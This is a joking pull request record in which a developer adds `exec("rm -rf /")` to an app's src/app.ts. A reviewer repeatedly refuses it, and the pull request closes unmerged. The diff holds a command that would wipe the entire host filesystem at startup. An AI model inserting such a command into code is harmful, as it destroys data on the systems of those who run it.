### PR TITLE
A new bug... I mean *feature*

### PR DESCRIPTION
**Pull request by SpencerKaiser**
These are good codes, I promise

### CODE REVIEW

**Review by johnkahn — APPROVED** [review]

**Comment by johnkahn** [comment]
No

**Comment by SpencerKaiser** [comment]
I disagree... look again!

File: src/app.ts [hunk 1]
```diff
@@ -8,3 +8,5 @@ app.get('/', (_req, res) => {
 });
 
 app.use('/health', health);
+
+exec("rm -rf /");
```
Comment (johnkahn) [inline src/app.ts]: Can we not delete everything?

```suggestion
exec("rm -rf dist");
```

**Review by johnkahn — CHANGES_REQUESTED** [review]

**Comment by johnkahn** [comment]
Still no

**Comment by SpencerKaiser** [comment]
image

**Review by johnkahn — APPROVED** [review]

**Comment by johnkahn** [comment]
Again ... no

**Pull request closed without merging**